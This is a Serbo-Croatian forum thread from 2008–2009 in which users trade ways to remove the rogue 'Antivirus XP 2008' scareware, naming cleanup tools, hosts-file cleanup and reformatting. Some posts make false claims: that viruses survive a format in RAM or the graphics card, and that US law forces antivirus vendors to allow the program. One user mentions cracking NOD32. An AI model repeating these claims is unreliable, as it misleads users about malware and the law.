[ Catch 22 @ 17.09.2008. 10:48 ] @
Citat:
CNET
Masquerading as software to protect your machine from threats, the "rogue" security program Antivirus XP 2008 uses deceitful and invasive tactics to con users. The fraudulent software will detect nonexistent viruses and other malware and use continuous pop-up windows to advertise the scam.

Although Antivirus XP 2008's antics are well known, it seems to have lately affected a rash of new users. It's also doubtful that the scamware will disappear anytime soon. Sunbelt's Alex Eckelberry recently noted the arrival of a new rogue clone, named XP Protector 2009.

One interesting aspect of the recent Antivirus XP 2008 outbreak is that many users with adequate antispyware and firewall protection are still finding themselves infected.

If you're one of the many unlucky PC users to get stuck with this malware beast, you don't need to reformat your hard drive (unless you prefer to, of course). At the least, first read Seth Rosenblatt's instructions for removing Antivirus XP 2008. He has step-by-step details in plain language for kissing that rogue spyware pest goodbye forever.

Read more about removing Antivirus XP 2008


Kompletno uputstvo:
How to remove Antivirus XP 2008
[ Zoran Rodic @ 17.09.2008. 11:30 ] @
Njega lako otklanja malwarebytes i tu nema mnogo nauke.
Problem je sto XP antivirus2008 dolazi sa nekim zlob ili vundo trojanom ... pa to treba proveriti
SpyBoot SD ce okloniti svaku sumnju sta se jos nalazi pored pomenutog XP antivirus 2008
[ Miroslav Jeftić @ 17.09.2008. 11:57 ] @
Sve informacije dobro dođu, na sve strane vidim da se žale na njega.
[ bugsu @ 17.09.2008. 17:24 ] @
drug mi imao taj "AV" ,kupio pc dobio uz njega legalan win XP Home i koristio ga nakon nedelju dana pokupio je taj "AV" mucio se 2-3 nedelje da ga skine,brisao je win svaki dan,formatioraco C: particiju uvek ,skenirao ceo pc ,formatirao zatim ceo hdd i uvek mu se vracao taj virus...
trazili smo po netu kako se ukljanja al nigde ne pise kako on dodje(udje) ,a drug ga nije skidao ....dal neko zna kako ulazi?
nesto sam procitao da napada samo Home Editio ..a drug ga se resi tako sto je presao na pro...
[ gti2 @ 17.09.2008. 18:03 ] @
Zaraza obicno pocinje online.Odjednom vam iskace prozor sa reklamom za doticni AV i ide onaj progres bar,satro kao nesto skenira.Onda napise da je nasao "tri hiljade i nesto" virusa i nudi vam download tog programa.Ako vam se desi ovako nesto,odmah zatvorite pretrazivac da bi nestao i taj prozor ;-) Nije tacno da napada samo Home Edition jer ja imam XP Pro pa mi se "nudio"...
[ RiciSambora @ 17.09.2008. 20:05 ] @
Citat:
bugsu: drug mi imao taj "AV" ,kupio pc dobio uz njega legalan win XP Home i koristio ga nakon nedelju dana pokupio je taj "AV" mucio se 2-3 nedelje da ga skine,brisao je win svaki dan,formatioraco C: particiju uvek ,skenirao ceo pc ,formatirao zatim ceo hdd i uvek mu se vracao taj virus...
trazili smo po netu kako se ukljanja al nigde ne pise kako on dodje(udje) ,a drug ga nije skidao ....dal neko zna kako ulazi?
nesto sam procitao da napada samo Home Editio ..a drug ga se resi tako sto je presao na pro...


Koliko ja znam, a kao sto je @gti 2 vec napisao, siri se online i nema veze da li je Windows Pro ili Home (mogu potvrditi da sam naisao na nekoliko slucajeva gdje je bio na Pro verziji). Tvoj kolega ili stalno posjecuje neki site koji ga automatski skida i instalira ili je naisao na neku prepravku koja je ubacila autorun na drugu particiju pa ga pokrene/instalira cim nju (particiju) otvori. Inace ovo drugo je cest problem koji se desava ljudima u zadnje vrijeme - sve vise je virusa koji prave autorun sebe samog u root-u praticija, ljudi formatiraju disk u nadi da ce ga ocistiti i zaraze se pri prvom otvaranju sekundarne particije.
Zato je potrebno odmah nakon nove instalacije sistema otvoriti My Computer, namjestiti da se vide skriveni i sistemski fajlovi i onda otvoriti sve particije, ali klikajuci na nju u tree, a ne dvoklikom i pobrisati sve sumnjive fajlove i pogotovo autorun.inf. (inace ko zna raditi u CMD-u moze zna kako ovo mnogo brze uraditi).
[ citerce @ 19.09.2008. 20:42 ] @
na dosta racunara sam se susreo sa ovim problemom, uspem da ga uklonim kao iz ovog tutoriala, ali posle 10tak minuta se pocinju javljati plavi ekrani BSOD, sa razlicitim porukama, nikad nije ista poruka.

Znaci dok ga ne uklonim BSOD-a nema nikako, kako ga maknem, tako imam BSOD svakih 2 minuta.
[ alagor2000 @ 19.09.2008. 22:27 ] @
ja sam ga se na visti rijesio sa FixIEDef.exe i Malwarebytes i to relativno lako ! :)
[ 1vi @ 20.09.2008. 07:12 ] @
I meni se "nakačio" pre desetak dana. Tada sam imao Norton antivirus. Pronađe ga i kao obriše. Međutim i dalje plavi ekran itd... Deinstaliram Norton, skeniram kompjuter sa "Spybot"-om i ubacim Bit Defender 2009 (probnu verziju od mesec dana) skeniram-pronađe ga. Restartujem komp i nestao !!! Naravno ostaje Bit Defender do daljnjeg! Nisam imao potrebe da reinstaliram Win. Eto mog iskustva.Pozdrav.
[ micky @ 20.09.2008. 11:38 ] @
I ja sam ga zakacio slucajno verovatno... poludeo.Malwarebytes otklanja lagano,ostavi neke dll zaostale pa javlja greske pri podizanju sistema ali oni se lako brisu rucno.
[ mcanji @ 20.09.2008. 12:34 ] @
Malwarebytes antimalware je nabolji,dva puta sam imala isti problem sa tim nazovi AV programom,otklonio ga je vrlo brzo i posle nisam imala nikakvih problema(nikakve pruke a kamoli BSOD).Još uvek ga imam instaliranog iako imam Avast! AV(koji nikako nije mogao da ukloni trojanca koji je došao uz AV XP 2008).Držim ga čisto za svaki slučaj :)))
[ madcama @ 20.09.2008. 22:19 ] @
Napada i Linux.
[att_img]
[ adopilot @ 20.09.2008. 22:59 ] @
Na web stranici http://www.bleepingcomputer.com/
ima besplatan alat koji se zove Combofix
downolujte isti.
Meni je pošlo za rukom na više računara
http://www.bleepingcomputer.com/combofix/how-to-use-combofix
[ Zoran Rodic @ 20.09.2008. 23:51 ] @
Takodje, pise i sledece:

Citat:
Due to the power of this tool it is strongly advised that you do not attempt to act upon any of the information displayed by ComboFix without supervision from someone who has been properly trained. If you do so, it may lead to problems with the normal functionality of your computer.


Ukratko, nemojte koristiti ovu alatku ukoliko niste sigurni da znate sta radite
[ rincha @ 21.09.2008. 02:23 ] @
SD resava problem, eventualno iz dva puta (skenira, ocisti i kaze da nije sve uspeo, pa trazi restart i onda pre restarta odskenira i ubije ga definitivno).

@mcanji Avast??? To ne moze ni sebe da zaustavi a kamoli neki virus. menjaj to sto pre. Ako nisi u situaciji da platis licencu za AV program (ili ti podaci sa kompa nisu bitni) skidaj i instaliraj free mesecne varijante, izbegavaj te besplatne, nisu sigurne.

Pozz
[ kristi1 @ 21.09.2008. 09:07 ] @
Combofix menja postavke racunara, tako da ko ne zna kako se radi sa tom skriptom nemoj da je koristi.
[ Zoran Rodic @ 21.09.2008. 12:44 ] @
Citat:
micky: ... a cini mi se da to nije virus vec malware ili adware...svejedno nervira :)


u pravu si ... xp2008 nije virus, ali virus jeste malware.

Malware je zajednici imenitelj za sve vrste malicioznog softvera (malicious software) i tu spadaju virusi, crvi, trojanci ... spyware ... rootkit ;)
[ Twilight Zone @ 21.09.2008. 16:35 ] @
ESET NOD32 - 47 successes and 3 failures (94% success)
Kaspersky - 40 successes and 15 failures (73% success)
.
.
.
.
.
Avast! - 24 successes and 20 failures (55% success)

Proveri kompjuter sa nekim drugim antivirus softverom, mozda se iznenadis.
[ micky @ 21.09.2008. 20:50 ] @
a Sophos?
proveravan je i sve je ok... ali eto iskustvo mi kaze da bezim od kaspersky....
nod 32 nisam probao...
mada i sve te liste su reklame :)
Ovo govorim samo iz licnog iskustva i racunara koje sam cistio...avast ima dobru opciju da skenira ceo sistem ali pre nego se podigne sistem a ima i opcija da napravis bootabilni CD sa AV i lepo cistis racunare redom ...
Ovo su samo moja zapazanja ne ulazim u raspravu ko je bolji..
[ TROM @ 21.09.2008. 22:32 ] @
Ne spamam nego meni je pomogao ovaj program http://www.malwarebytes.org/mbam.php u free verziji rjesio mi je puno muka... skini ga izvrsi update... skeniraj kada zavrsi skeniranje odes na show result i skidas sto je nasao..:)

Sa srecom
[ PassingBy @ 21.09.2008. 23:38 ] @
To što "napada" linux ne znači apsolutno ništa. Koliko vidim nudi da se skine exe fajl, a on će kao uspeti da napravi neku štetu na linuxu...Ajde da je neka shell skripta pa da se zabrinem, ali ovako najviše štete može samo da napravi unutar .wine dira.

Inače ekipa, koja je napravila ovo smetalo, se dosta oslanja na java scriptu da bi navukli lakoverne kako se njihova mašina skenira, a u stvarnosti vuče se jedna te ista flaš animacija. Za ovakve napasti najbolje rešenje je NoScript ekstenzija za FireFox (blokada svih skripti i flash animacija dok se to eksplicitno ne dozvoli, zaštita od XSS-a), potom Controle de Scripte (bolja kontrola nad java scriptom) i naravno AdBlock Plus, za blokiranje reklama pošto se one mahom koriste kao navlaka.
[ motohed @ 22.09.2008. 09:00 ] @
Taj BSOD koji dobijas je, ustvari, "fake" iliti naski "laznjak"... stisni dva puta Esc i on ce nestati! Ako obratis paznju sta ti napise da ti "nedostaje", onda ces shvatiti... To isto SpyBoot skida. Ne zaboravi pokrenuti i HijackThis program i iskljuciti sve nepotrebno (naravno, ako znas.. )
[ calimero @ 23.09.2008. 02:08 ] @
i vi ste uspeli ovako da ocistite komp ??

iskljucili dva fjla da se ne startuju prilikom podizanja Windosa i to je to?

ja sam zapatio na jednom racunaru slican (nije isti kao na screenshootu sa prvog linka) virus i to je prva stvar koju sam pokusao:

prvo ubijem proces iz taskmanagera pa ga zatim izbacim iz StartUp-a.

ali posle dve reboota Windowsa ponovo se pojavi!

onda sam gotovo sve sto sam mogao poiskljucivao i opet se pojavi :( kao da je zarazio npr. explorer.exe ili neki drugi "vitalni" deo windowsa... :/

kako bilo, morao sam da formatiram C:
[ mihajilo @ 24.09.2008. 17:16 ] @
e napada linux :P to je bas dobra fora,kada nekom normalnom ko koristi linux izbaci onaj spisak virusa,bas se zabrine i pokusava da ga instalira,smesno.
avast je odlican antivirus,ali kome to jos treba,dovoljno je imati firewall u ruteru ili instaliran na kompu,neki malo bolji task menager od windowsa i na primer autoruns.exe ako dodje do nekog propusta,a podrazumeva se da pri tome korisnik zna da koristi racunar,jer ako ne zna nece mu pomoci ni hiljade antivirusa i antispaywera ni ne znam cega.
evo ja sam bas cistio bratov racunar koji je imao ova antivirus xp 2008 + cca 1500 drugih virusa i uspeo sam da ocistim od svega i sad radi(sto i mene cudi) sasvim ok,naravno stavio sam mu avast i dobar firewall,na moju zalost on ne zna da koristi racunar,pa cu ja imati posla ponovo kroz neki period.najbolje od svega sto njegov racunar kada sam ga preuzeo na ciscenje nije mogao nista da radi,znaci podizanje windowsa min 5 min,ali nije bilo sanse nista pokrenuti kada se podigne windows,task menager je bio zabranjen,iz komande run takodje nista nije moglo da se pokrene,a kada sam pokusao da pokrenem instalaciju bilo cega,sa dvoklikom bi mi pokazao opciju open with,pa cak i kada sam pokusavao exe programe koji su vec bili instalirani da pokrenem.kada sam uspeo da pokrenem autoruns.exe nije mi bilo dozvoljeno nista da ugasim. ipak sam uspeo da instaliram avast i da pokrenem boot scan i posle sam antivirus xp 2008 ubio malwarebyte-om i sredio os da sam se i sam cudio kako je bilo moguce posle svega da radi ispravno.

[ Deyan_80 @ 25.09.2008. 12:14 ] @
Poz svima. Vidim da ste i vi imali problem sa ovim sra.... Mene je nekoliko puta zakacio i formatirao sam disk jer do tada nisam koristio nijedan anti-virus.

Pokusavao sam da instaliram NOD 32 (neke starije verzije) ali nikako nisam uspeo da update-ujem bazu jer nisam uspevao da ga crackujem kako treba.

Tek kada sam nasao verziju 3.0.642.0, koja je imala dobar fix NOD je proradio i to odlicno. Vec nekoliko puta me je obavestavao na viruse "Antivirus XP 2008 / XP Protector 2009" i isti mi nisu naneli nikakvu stetu.


E sad moje resenje za ovakav problem. Naime, kada sam formatirao disk prvi put i instalirao sve sto mi treba nije proslo ni nedelju dana opet mi je upao doticni virus ali me je mrzelo da formatiram particiju i da idem sve ispocetka pa sam probao da vratim system preko System Restore-a i to mi je upalilo na svu srecu. Naravno imao sam srece da nisam iskljucio System restore (sto inace redovno radim kada instaliram system).

Samo da napomenem da koristim Win XP Pro SP2.
[ cronos_ki @ 26.09.2008. 13:43 ] @
E ljudi, ne znam gde da napisem ovaj post ali u zurbi sam pa ga ovde pisem... Potrebna mi pomoc i ako moze neko da mi odgovori na email [email protected].. Problem je da imam neki virus a ne znam koji jer ne moze antivirus da ga skenira... Eo kako radi. Ukljucim comp, radi normalno i posle nekog vremena,ako npr slusam muziku, krene da se ponavlja kao pokvarena ploca (i to brzo) i posle 10ak sekundi normalno i onda opet tako... Ako znate sta je molim vas da mi odgovorite na email! hvala unapred!
[ Nexxuss @ 27.09.2008. 21:46 ] @
Imao sam isti problem samo sam preso na drugu particiju i sve normalno funkcijonise.
[ n1tr0 @ 28.09.2008. 02:19 ] @
Citat:
bugsu:
nesto sam procitao da napada samo Home Editio ..a drug ga se resi tako sto je presao na pro...

Ovo je za [es] bisere definitivno... :P

Back on topic: Jel' iko ko se "zarazio" probao da ga ukloni sa HijackThis?
[ branka78 @ 03.10.2008. 16:16 ] @
@n1tr0
Ja sam uspela bez problema da uklonim AntiVirus 2008 uz pomoc HijackThis. Vise nikakvih problema nisam imala
[ magna86 @ 05.10.2008. 22:50 ] @
xp antivirus je obican rogue program
za uklanjanje istog koristite
RogueRemover
http://www.malwarebytes.org/rogueremover.php

posle toga sceniranjem sa Malwarebytes
http://www.malwarebytes.org/mbam.php

naravno...uz ovo pozeljno skeniranje i sa AV i AS programima
preporucujem KIS + Spybot S&D

a ako nista nepomogne...tu je HijackThis i ostali alati..
mada ovo gore bi trebalo da ga "ubije"
[ Alexdja @ 10.10.2008. 18:59 ] @
http://www.2-spyware.com/remove-antivirus-2009.html
[ mld @ 14.10.2008. 09:05 ] @
Taj antivirus xp 2008, je malware i Avast narvno da ga propuštao.
ako hoćeš siguran rad obavezno je:
- redovan i pouzdan backup važnih podataka, a ako se radi o poslovnom okruženju onda se može dobro razmisliti i o backup-u softwera i sistemskih komponenti
- redovni Update operativnog sistema pogotovo Windowsa
- obavezan antivirus program
- obavezan antispyware/antimalware
- obawezan firewall
- dobro podešeni klijent za poštu i browser
- redovno praćenje log fajlova i brisanje tmp fajlova pogotovu iz browsera.
- naravno verovatno se može o još ponečemu reći detaljnije ali je ovo dovoljno.

Ukoliko išta od ovoga propustiš, naravno da ćeš imati problema, ali nije uvek samo rešenje u preinstalaciji sistema, ako se pouzdano zna da ni obično formatiranje diska u potpunosti ne rešava uvek probleme.
[ mihajilo @ 14.10.2008. 10:39 ] @
Citat:
mld: Taj antivirus xp 2008, je malware i Avast narvno da ga propuštao.
ako hoćeš siguran rad obavezno je:
- redovan i pouzdan backup važnih podataka, a ako se radi o poslovnom okruženju onda se može dobro razmisliti i o backup-u softwera i sistemskih komponenti
- redovni Update operativnog sistema pogotovo Windowsa
- obavezan antivirus program
- obavezan antispyware/antimalware
- obawezan firewall
- dobro podešeni klijent za poštu i browser
- redovno praćenje log fajlova i brisanje tmp fajlova pogotovu iz browsera.
- naravno verovatno se može o još ponečemu reći detaljnije ali je ovo dovoljno.

Ukoliko išta od ovoga propustiš, naravno da ćeš imati problema, ali nije uvek samo rešenje u preinstalaciji sistema, ako se pouzdano zna da ni obično formatiranje diska u potpunosti ne rešava uvek probleme.


ako hoces siguran rad obavezno je pre svega:
-nauciti nesto o racunarima
-nauciti nesto o malicoznim programima(sta su, kako rade,zastiti od njih)
-nauciti nesto osnovno o operativnim sistemima
-nauciti nesto o firewall-ovima i podesavanju istih
-disciplinovati se u koriscenju racunara

u protivnom dzaba je sve ostalo jer ako ne znas sta radis sigurno ces pogresiti(Marfi ce se pobrinuti za to) :)
[ Agent Smit @ 22.10.2008. 12:31 ] @
Reinstalirao sam Windows XP Home, tek što sam to uradio, zapatio sam ovaj Antivirus...i pored Avasta...šta raditi?
probaću da ga ubijem, ali mi se ne čini da će proći sve sem formatiranja, a pitanje je da li će i to
[ Agent Smit @ 23.10.2008. 09:27 ] @
Pratio sam uputstvo, otišao u startup i tamo ga isključio, zatim ga samo uklonio iz program filesa, a nakon toga iskenirao sistem sa malwarebytom, i nema ga više. Da li ga stvarno nema ili se prikrio, videćemo, uglavnom malware je ubio masu njih, oko 32 trojanca. Nisam mogao da nađem one fajlove u system32, kako piše u uputstvu, nego ih je uništio malware...Trebalo bi da je sve ok, ispalo je lakše nego što sam očekivao. Sad sam stavio i firewall.
[ citerce @ 23.10.2008. 22:02 ] @
otvorio si neki sexy sajt, i tako si ga navukao, ima na netu klip kako se zarazava sa tim "antivirusom"., malware ga unistava od shale
[ Deyan_80 @ 26.10.2008. 16:55 ] @
AGENT SMIT

Pokusaj sa System Restore. Meni je upalilo.
[ vetmedic @ 26.10.2008. 20:01 ] @

Ima 3 nacina: Avast, Trojan remover ili Spybot, svi oni skeniraju komp pre nego so se windows krene.
[ magna86 @ 28.10.2008. 19:04 ] @
a sto komplikujete bezveze??
to je rogue program...
ubija ga MBAM i MBRR
ako ostanu neki ostatci,moze da se resi HjT i ostalim alatima



Code:
xp antivirus je obican rogue program
za uklanjanje istog koristite
RogueRemover
http://www.malwarebytes.org/rogueremover.php

posle toga sceniranjem sa Malwarebytes
http://www.malwarebytes.org/mbam.php

naravno...uz ovo pozeljno skeniranje i sa AV i AS programima
preporucujem KIS + Spybot S&D

a ako nista nepomogne...tu je HijackThis i ostali alati..
mada ovo gore bi trebalo da ga "ubije"



mada..moze da se desi da taj antivir 2009 nedozvoli skidanje MBAM-a...
kao ni jednog drugog programa...zato..deco..koristite zastitu
[ miodrag75 @ 29.10.2008. 01:34 ] @
Prva zastita je GLEDAJTE gde klikcete a ne sammo yes yes yes yes yes yes yes jer ako tako nastavite nikad necete resiti taj problem uvek ce se vracati vas voljeni XP Antivirus koji u paketu nosi i zlob trojanca i jos neke sitnije zezalice jer naravno treba nesto i da ocisti :D.Zbog cega formatirate hard kad moze da se pokrece iz bilo koje druge memorije npr ram. Prvo ocistite komp pa tek onda preintalirajte os jer nije neko resenje odmah formatiranje neki virusi moze veoma lako da se zadrze i u ramu ili eventualno u grafickoj. Ja licno vec duze vremena apsolutno imam cist komp ( na kompu koji ima window) ali ne zbog nekog av vec jednostavno se drzim pravila koje sam na pocetku napisao
[ madcama @ 29.10.2008. 08:17 ] @
Citat:
citerce: otvorio si neki sexy sajt, i tako si ga navukao, ima na netu klip kako se zarazava sa tim "antivirusom"., malware ga unistava od shale

Vrlo ne mora da znaci. IE7 je previse osetljiv na njega, pogotovo kada se iskljuci Phishing filter. Meni se pojavio 'kao spasonosni faktor' kada sam hteo da napravim msn nalog.
[ Catch 22 @ 29.10.2008. 08:40 ] @
Još korisnih uputstava:
How To Safely Remove BestSeller Antivirus

Ako vam se dešavaju situacije kao na sličicama...

[ kristi1 @ 29.10.2008. 09:14 ] @
Desava se da recimo ne moze da se skine ni jedan antimalware alat sa neta, niti AV, jednostavno ovaj virus to ne dozvoljava kao sto je napomenuo magna86
U tom slucaju treba proveriti odnosno obrisati sve iz Hosts fajla, kako?
Preko notepada otvoriti hosts file C\Windows\System32\Drivers\etc\hosts i izbrisati sve ispod "127.0.0.1 localhost"
[ Urkelele @ 29.10.2008. 13:11 ] @
Citat:
Catch 22: Ovde si nepravedno izostavio modem, CD-ROM...

Osim ako ti virusi ne uspevaju da prežive i kada je računar isključen, a u tom slučaju bi bili sumnjivi i miš i tastatura...


A zar niko nije cuo ili procitao da za odredjene viruse mora proci 15-21 dan da se potpuno ociste... tj. da bude komp iskljucen taj period kako bi se zasigruno unistili

E, ni meni nije jasno kako ljudi uspevaju da navuku ovaj virus... Lepo je neko napisao da ne treba samo na yes yes yes yes yes yes yes yes yes ... finish... nego treba nesto i da se cita.

I ja sam se jednom namucio da skinem ovaj antivirus, ali ne znam dal' ce da mi verujete, uspeo sam samo sa KAV-om i rucnim potezima u startup-u i registirma.
E posle toga sam na ostalim racunarima koristio, pored KAV-a, Malwarebyte's i HijackThis i uspesno resavao.

Nisam citao sta ste sve pisali, ali pretpostavljam da je neko vec izmislio "OnClick" ciscenje ovog virusa, ali ja nisam bas siguran na takvu vrstu ciscenja.

Pozdrav.
[ ernie mikrotik @ 01.11.2008. 20:53 ] @
Posto radim sa netom stalno imam srece (citaj nesrece) da se susrecem sa svim mogucim i nemogucim virusima i gamadima sa neta.
Kad vas napadne neki od njih najbolji je recept.FORMAT i to onaj puni bez zastite podataka to ce rijesiti sve probleme,ali problemi nastaju kad radite format uz zastitu podataka jer doticni virusi ostanu negdje u tim podacima i opet jovo nanovo.
Sto se tice ovog tipa virusa (antivirus XP 2008 iliti 2009)Evo kako ja uobicajno ubijam tu gamad.Prvo Obirisem sve tempove na racunaru ako neki nece da se obrisu koristim mali ali jako vrijedan programcic "unlocker" uz njega jos koristim process explorer pa pratim sta se sve otvara i koristi mem od racunara.Zatim obrisem sve cookies.Jos nesto morate u folder postavkama ukuljuciti da vidite skrivene fajlove,ako vam je virus blokirao da vidite skrivene fajlove.Preko alatke search nadjite foldere TEMP i Temp internet files.Nakon toga pokrecem spyboot search&destroy nakon njega na posao stupa nod32 antivirus.Ipak desavalo mi se da ni tad ne uspijem do kraja ubiti taj virus posto nakon 2 ili tri dana opet pocne da izbacuje upozorenja.Uspijevam negdje oko 70% ostalo rjesavam formatom s tim sto ako trabam zastiti podatke kod korisnika kacim njegov hard na drugi komp koji ima svu mogucu zastitu kaspersky puna verzija ili AVG internet security full pa preskeniram prije rada formata.Eh da zavrsim onaj combo fix je jako dobar kad vam virusi ostave iza sebe autorun komande pocesto sam ga pokretao nikad mi nije pravio probleme znaci ok je
[ Goran Mijailovic @ 02.11.2008. 14:12 ] @

@ernie mikrotik probaj Malwarebytes' Anti-Malware, odlicno se nadopunjuje sa Spyboot search&destroy, kao sto bih preporucio kada vec cistis racunar da NOD 32 upotpunis sa Kaspersky AV naravno ne da ih instaliras u isto vreme na racunar. Sto bi rekao jedan moj drugar: "Ukoliko koristite neki od besplatnih AV resenja kao sto su Avira ili AVG a pritom predjasni pokusaji nisu dali rezultata, slobodno deinstaliraje AV i skinite Nod32 ili Kaspersky u probnoj ali u 100% funkcionalnoj varijanti kako bi ste iskenirali racunar.
Nakon uspesnog uklanjanja zlonamernog softvera, pomenute probne verzije mozete deinstalirati i vratiti svoj stari besplatni antivirus."
[ Aske01 @ 09.11.2008. 00:18 ] @
ne moze sam NOD ukloniti...navedeni AV
ja pak koristim set programa:
1.CCleaner
2.Smitfraud Fix
3.ComboFix
4.Ad-aware
5.SpyBot SD
6.Spyware Blaster
7.Google Toolbar
ovim redom se instaliraju alati...
kada se instaliraju pokrenem update za program br. 4 i 5
raskacite komp sa neta... i pokrecem redom programe...
Google Toolbar je eto kao da sprijeci ove pop up al eto ko ga ne voli nek stavi neki drugi:)
kad sam zavrsio ciscenje sa ovim programima ubacim ESET Smart Security pokrenem ciscenje sa Esetom i racunar nema vise Antivirus XP 2008 i ostale gamadi...:)
Provjereno, ocistio sam barem 50ak racunara ovom metodom... sa srecom i pozz ;)


[Ovu poruku je menjao Goran Mijailovic dana 09.11.2008. u 02:30 GMT+1]
[ Deyan_80 @ 16.11.2008. 14:24 ] @
Po meni je opet najbolja fora sa System Restore.

Kod mene je upalilo i nemam problema. Mnogo je brze od formata a ne morate da se zezate po netu i trazite pomocne programcice.
[ magna86 @ 17.11.2008. 06:16 ] @
sistem restore ne moze da ukloni virus ni kao ni rogue..
[ Deyan_80 @ 17.11.2008. 12:42 ] @
Ok. Mozda ne moze ali zasto mi onda comp radi kao da se nista nije dogodilo?

Cak nemam ni dodatnih procesa.
[ Agent Smit @ 17.11.2008. 12:59 ] @
Verovatno ti se pritajio..
[ kristi1 @ 17.11.2008. 13:08 ] @
@Deyan_80 skini Malwarebytes pa proveri system.
[ Deyan_80 @ 18.11.2008. 12:36 ] @
Hvala Kristi. Nasao je bas ono sto je trazio mada meni posle restora nije smetao.

U listi koju mi je malwarebytes izbacio nijedan exe mi nije bio u procesima sto znaci da iako je "sra..." prisutno nista ne radi tako da i nema neke koristi od njegovog uklanjanja ali nije zgoreg ukloniti ga.
[ MMaarrCCoo @ 18.11.2008. 13:38 ] @
Jedino sigurno resenje je formatiranje particije.I sam sam to uradio juce.Nema mu spasa,i pored ESSET Smart Security i Sygate Firewalla je prosao.
[ Aske01 @ 18.11.2008. 13:43 ] @
jeste najbolje ubaciti svjez windows ali ako nekome nije do reinstalacije onda je najbolje poubacivati programe i ocistit komp...
[ goomica @ 24.11.2008. 21:22 ] @
Ovaj tzv antivirus sam uklonio ni sam ne znam kako i posle koliko skeniranja diska. Sada imam drugi problem, blokirao mi je automatic update. Pokupio sam izgleda trojanca koji je to uradio i nikako ne mogu da ga aktiviram. U control panelu>sistem>auto update je čekiran automatic update on, ali ne radi. Ne mogu da updatujem ni windows ni antivirus NOD 32. Da nesreća bude veća reinstalirao sam NOD pa sada ne mogu da update ni jednu noviju datebase, što će reći da praktično i nemam antivirus zaštitu.

Pomagajte.
[ Take 5 @ 25.11.2008. 08:15 ] @
Izgleda da je konacno i Microsoft resio da se malo umesa u vezi ovog problema:

Microsoft cleans fake antivirus tool from 994,061 PCs


Citat:
The company did note, however, that for every one thousand machines in the US scanned by MSRT during the last seven days, roughly five were infected with FakeSecSen rogues. That's quite high for just one piece of malware, but things could have been much worse, according to Microsoft:
Normally each FakeSecSen installation contains one EXE, one or two DAT files, one Control Panel applet (CPL), one desktop shortcut and sometimes one uninstaller. It is interesting that only 20 percent of these removals contain executables of FakeSecSen. This indicates either the other 80 percent had at one point been infected by FakeSecSen and the threat was then manually and partially removed, or the machines were cleaned by other AV products/tools, or FakeSecSen had failed to install, etc.
[ Agent Smit @ 25.11.2008. 09:45 ] @
I meni se desilo da prilikom reinstalacije, nakon toga je izgleda uleteo neki trojanac, koji nije dozvoljavao automatic update..ali je to bilo neposredno pre nego mi je crkla matična ploča...sad sam ubacio drugu koju su mi zamenili jer je ova bila pod garancijom..uglavnom pre toga su mi se dešavale te čudne stvari.
Sve je krenulo od onoga "NTDLR is missing", jedno jutro mi je samo to prijavio, naravno posle toga je pala reinstalacija, da bi zatim zapatio ovaj fake ANtivirus i sve uz njega...Na kraju mi je crkla motherboard...
Sad ćutim i uživam, maksimalno zaštićen..
[ backup @ 10.12.2008. 00:58 ] @
Problem ovog virusa je sto on i nije virus po americkom zakonu. Neko rece ranije - nemojte samo kucati na "YES" i posle se cuditi. Po njihovom zakonu nesto je nedozvoljen program (malware, virus...) samo ako se instalira BEZ Vaseg znanja. Vi ste kliknuli na "YES" kad Vas je on upitao zelite li da se instalira. Samim tim ste pristali na sve njegov posledice. Zato veliki AV programi i MORAJU da ga propuste. On je legitiman!!! Zbog toga neka od ovih resenja rade neko vreme pa prestanu. Ako niste primetili, njega se mozete resiti i ako ga platite. Onda ga registrujete i tek tada dozvoljava deinstall. Ali 50$..... To samo znaci da oni, zbog gomile naivcina, imaju puno love i mogu da tuze svakoga ko ih smatra virusom i kao takve uklanja - budite sigurni da to i rade i da ce ovakvih programa da bude sve vise.

[Ovu poruku je menjao backup dana 10.12.2008. u 19:15 GMT+1]
[ AlexSu500 @ 15.12.2008. 18:42 ] @
Upravo je tako kako je Backup rekao nisam do sada imamo ni jedan firewall, antispyware itd sem AVAST-a i to free a pogledajte ovo:

Malwarebytes' Anti-Malware 1.31
Verzija baze podataka: 1501
Windows 5.1.2600 Service Pack 2, v.2149

15.12.2008 19:40:09
mbam-log-2008-12-15 (19-40-09).txt

Tip skeniranja: Brzo Skeniranje
Skeniranih objekata: 48860
Proteklo vreme: 3 minute(s), 9 second(s)

Inficirani procesi u memoriji: 0
Inficirani moduli u memoriji: 0
Inficirani kljuèevi u registru: 0
Inficirane vrednosti u registru: 0
Inficirani podaci u registru: 0
Inficirane fascikle: 0
Inficirane datoteke: 0

Inficirani procesi u memoriji:
(Maliciozne stavke nisu detektovane)

Inficirani moduli u memoriji:
(Maliciozne stavke nisu detektovane)

Inficirani kljuèevi u registru:
(Maliciozne stavke nisu detektovane)

Inficirane vrednosti u registru:
(Maliciozne stavke nisu detektovane)

Inficirani podaci u registru:
(Maliciozne stavke nisu detektovane)

Inficirane fascikle:
(Maliciozne stavke nisu detektovane)

Inficirane datoteke:
(Maliciozne stavke nisu detektovane)
mislim da ovo dovoljno govori o avastu i o odgovornosti prilikom surfovanja
Pozdrav
[ dimnicar @ 22.12.2008. 11:18 ] @
Sto se tice antivirusa 2009 ne slazem se sa onima koji kazu da mora da se pritisne yes da bi se instalirao.
Cak i ako ga kanselises on pocinje da skenira,govoreci pri tom da je zarazen ceo komp i da sve treba brisati.Evo mene je ovih dana upravo napao.,ali mu uspesno odolevam.
u kasperskom sam chekirao enable file antivirus i web antivirus stavio ih na maximum,anti pishing i antidiler su mi takodje enabled,i za sada se dosadni skot ne pojavljuje. Taj skot se ne mora aktivirati sa "YES,YES,YES" dugmetom. Dovoljno je da ti neko postavi link "koji te vodi ka necemu sto ti trazis",a u stvarnosti te odvede do linka antivirus 2009,Mozes i da mu stisnes dugme NO,ili da ga kenselise Gospodin SKOT pocinje da skenira.Ako se to desi ,diskonnektuj se i restartuj sistem da zeznes skota,a zatim probaj da cekiras u kasperskom ona polja enable...... Eto mene skot za sada vise ne uznemirava.
[ cyberdjomla @ 16.01.2009. 03:58 ] @
Koliko sam ja mogao da primetim na ovom forumu se pojavljuju poruke tipa: 1."Kad to vidis restartuj...", 2."Falio mi je NTLDR..." i sa njim verovatno i Boot.ini kao i Ntdetect.com, 3."Najbolje je resenje da formatiras...", 4."Instaliraj... to to to to to i to pa i jos to...", 5."Probaj ovaj rootkit, probaj onaj ...".
JBT. ljudi ima li ovde nekoga ko nije laik za racunare sem dvojice (mislim) koji su Vam dali najpametnije savete do sad.

Jednostavno:
1.Nemas potrebe da restartujes racunar ako ti je iskocio neki takav smesan prozor. Zatvori page. Danas svi browser-i imaju tabed fazon i lepo kliknes na X.

